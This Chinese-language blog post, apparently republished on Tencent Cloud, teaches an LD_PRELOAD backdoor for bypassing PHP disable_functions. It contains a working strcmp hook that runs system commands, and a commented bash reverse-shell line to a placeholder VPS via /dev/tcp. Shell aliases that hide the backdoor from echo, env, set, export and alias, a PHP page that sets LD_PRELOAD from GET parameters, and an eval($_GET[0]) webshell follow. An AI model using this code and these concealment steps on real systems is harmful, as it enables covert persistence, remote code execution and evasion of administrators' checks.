前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >LD_PRELOAD 后门 | bypass disable_functions

LD_PRELOAD 后门 | bypass disable_functions

作者头像
h0cksr
发布2023-05-16 14:24:59
7950
发布2023-05-16 14:24:59
举报
文章被收录于专栏:h0cksr的小屋h0cksr的小屋

LD_PRELOAD 后门

用途

主要是用于绕过 disable_functions ,本质上是加载顺序的问题,

动态链接库加载过程中会先加载 LD_PRELOAD 指向的变量,这样我们可以利用这个先加载来进行劫持正常的函数和命令

只要劫持系统命令调用的一个函数就可以在劫持函数任意执行其它函数从而绕过disable_functions

劫持命令调用函数的步骤:

  • 在内部重写函数,将原有的函数覆盖
  • 将原函数指针赋值给一个变量
  • 触发重写的函数
  • 在重写函数中执行原函数
  • 照常返回正常值(保证命令的正常执行)

漏洞原理

  • Linux ELF 共享库加载顺序: LD_PRELOAD -> /etc/ld.so.preload -> DT_RPATH(编译指定) -> LD_LIBRARY_PATH -> [/etc/ld.so.conf] -> /lib -> /usr/lib
  • /etc/ld.so.nohwcap 这个文件如果存在,可以禁止加载优化的库,不需要写任何内容 如果存在此文件,则动态链接程序将加载库的非优化版本,即使CPU支持优化版本也是如此。

劫持命令流程

使用readelf -Ws查看命令使用了哪些库函数, 选取一个函数劫持,再使用strace查看函数的参数写劫持函数,

我们在这里使用命令经常用到的字符串比较函数strcmp()

同时可以看到vi是使用了strcmp函数的

图片.png
图片.png

strcmp_hook.c

代码语言:javascript
复制
#include <stdlib.h>
#include <string.h>
int strcmp(const char *s1, const char *s2) {
    unsetenv("LD_PRELOAD");
    system("ifconfig");
    return 0;
}
//值得注意的一点是我们要在劫持函数里面要使用unsetenv删除环境变量LD_PRELOAD,否则会导致下面system函数打开一个新进程执行的命令又再次使用到strcmp函数, 进入一个死循环, 而且我们写的劫持函数返回的结果是异常的, 就会导致服务器崩掉(已经试过了,,,特别是执行的命令本来就有错误的情况下)
//system("bash -c 'bash -i >& /dev/tcp/vps/port 0>&1");
  1. 编译 gcc -shared -fPIC /test/strcmp_hook.c -o hack.so -ldl
  2. 设置 LD_PRELOAD export LD_PRELOAD=/test/hack.so
  3. 运行命令触发覆盖函数 vi
  4. 检查是否存在 LD_PRELOAD 后门的时候可以直接运行echo $LD_PRELOAD

可以看到完成变量设置之后执行vi就会执行ifconfig命令

图片.png
图片.png

遇到个奇怪的问题:

在完成以上操作后发现执行which命令也会运行ifconfig命令很明显就是执行了劫持函数strcmp, 但是使用strace which查看which命令的运行过程又看不到strcmp函数的执行记录, strace不显示strcmp的执行记录猜测可能是下面两个原因(以后知道了的话再回来填坑)

  • which的运行过程中执行的函数间接执行了strcmp函数
  • which的运行过程中开启了一个新进程执行其他命令,而这个命令就调用了strcmp

后门加固(使用alias)

通过使用alias给命令定义别名,重新定义命令的执行,将暴露后门的内容给过滤掉再输出即可

  • echo

alias echo='func(){ echo $* | sed "s!/hack.so! !g";};func'

  • env

alias env='func(){ env $* | grep -v "/hack.so";};func'

  • set

alias set='func(){ set $* | grep -v "/hack.so";};func'

  • export

alias export='func(){ export $* | grep -v "/hack.so";};func'

  • unalias
代码语言:javascript
复制
alias unalias='func(){ if [ # != 0 ]; then if [* != "echo" ]&&[ * != "env" ]&&[* != "set" ]&&[ * != "export" ]&&[* != "alias" ]&&[ * != "unalias" ]; then unalias*;else echo "-bash: unalias: ${*}: not found";fi;else echo "unalias: usage: unalias [-a] name [name ...]";fi;};func'
  • alias

alias alias='func(){ alias "$@" | grep -v unalias | grep -v hook.so;};func'

注意

  • 使用 readonly 命令设置的环境变量不可修改
  • 在有SUID,SGID存在的文件是无视 LD_PRELOAD 的,无法用 :LD_PRELOAD 劫持
  • 获取命令的源码 git clone git://git.sv.gnu.org/coreutils
  • man 可以获得命令的详细使用方法
  • 并不是只要命令使用到劫持函数就会运行c代码中的命令执行payload(原因已经在下面pwd劫持失败原因埋坑了)

whoami和pwd都执行了puts()函数,但whoami会执行payload而pwd命令就不会执行payload

whoami 命令和 pwd 命令都调用了 puts 函数,使用 ltrace 进行查看的时候还都实际调用执行了,但是 pwd 不会触发 payload

设置好后门后使用 ltrace 追踪 whoami 和 pwd 命令,此时,两个都可以执行 payload

ltrace 追踪 ssh、id 等命令的时候不会触发 payload

劫持失败原因

虽然我进行函数劫持的过程中没遇到这个问题,不过也在这里记录一下吧,以后如果遇到劫持失败的情况也可以做一个可能性参考情况

里面是作者ltrace 显示pwd有执行put函数但是运行pwd却没有劫持成功, 但运行/bin/pwd/usr/bin/pwd却成功执行代码的分析原因

这个发现过程看起来有点精彩:https://cloud.tencent.com/developer/article/1835020

总的来说就是:

执行pwd不会执行payload

执行/bin/pwd/usr/bin/pwd就会执行payload

cd pwd 这些内置命令执行的时候不会加载外部共享库,也就是不会去加载我们的 hook.so ,更不会劫持 puts 函数

其实 bash 怕像cd pwd 这种命令 /bin 目录下的二进制文件在不同系统中存在差异,所以自己集成了cd pwd 等命令

bash 内置命令一般有两个原因,一种是为了兼容性,为了不被外部程序干扰,比如 cd pwd 命令;另一种是为了执行的效率,bash内置更加高效一些

所以 cd pwd 内置命令执行的时候不会加载外部共享库,也就是不会去加载我们的 hook.so ,更不会劫持 puts 函数

我们可以通过 type -a <command>的命令判断给出的指令是内部指令还是外部指令

可以看到我们直接使用的pwd是一个内置函数,所以就不会加载外部共享库进而触发覆盖的puts()函数,但是/bin/pwd/usr/bin/pwd是外部函数可以加载外部共享库进而通过覆盖的puts()执行payload

我自己看到的

按照上面文章说法劫持失败原因是因为pwd命令默认执行的是内置命令,但是我自己使用which 查看我当前默认使用的pwd命令就是/usr/bin/pwd, 所以劫持函数正常运行

图片.png
图片.png

一些其他命令

查看命令调用的库函数

代码语言:javascript
复制
readelf -Ws /usr/bin/ls
#查看ls命令调用了哪些库函数
strace /usr/bin/ls
# 更推荐用这个查找命令的调用函数明细,因为这里还可以看到函数执行的参数方便我们重写函数进行劫持(否则参数类型对不上的话不会执行我们重写的hook函数)
strace -f php function.php 2>&1 | grep -A2 -B2 execve
#查看php文件执行后调用了哪些系统命令,然后再使用readelf查看调用的系统命令使用了哪些库函数,对其进行劫持
# 可以在php文件里面只执行一个函数,然后我们就可以看到该函数执行了哪些系统命令

查看环境变量的方式:

代码语言:javascript
复制
echo LD_PRELOAD 
env
set 
export #值得注意的是export设置的环境变量只在当前shell有效
# 例如在xshell一个窗口设置好LD_PRELOAD变量后再打开一个窗口输出LD_PRELOAD变量显示为空
cat /proc/PID/environ

删除环境变量:

代码语言:javascript
复制
unset LD_PRELOAD

一些其它

index.php

代码语言:javascript
复制
<?php
    putenv("_GET[0]=_GET[1]");
    echo `vi`;

payload: ?0=LD_PRELOAD&1=/test/hack.so

因为在执行bash -c "export LD_PRELOAD=ifconfig"会执行里面的ifconfig命令然后把执行结果赋给LD_PRELOAD,所以想了能不能直接通过putenv函数执行代码,但是测试后发现实际上执行的效果是会直接带着/将原字符串原封不动赋给LD_PRELOAD,相当于执行了export LD_PRELOAD=’\ifconfig\

如果我们在系统执行export LD_PRELOAD="\ifconfig\"可以发现\\里面的命令还是可以被执行

图片.png
图片.png
图片.png
图片.png
图片.png
图片.png
代码语言:javascript
复制
<?pph
    echo `env`;
    eval($_GET[0]);
图片.png
图片.png
本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2022-3-04 0,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • LD_PRELOAD 后门
    • 漏洞原理
      • 劫持命令流程
        • 后门加固(使用alias)
          • 注意
            • 劫持失败原因
              • 一些其他命令
                • 一些其它
                领券
                问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档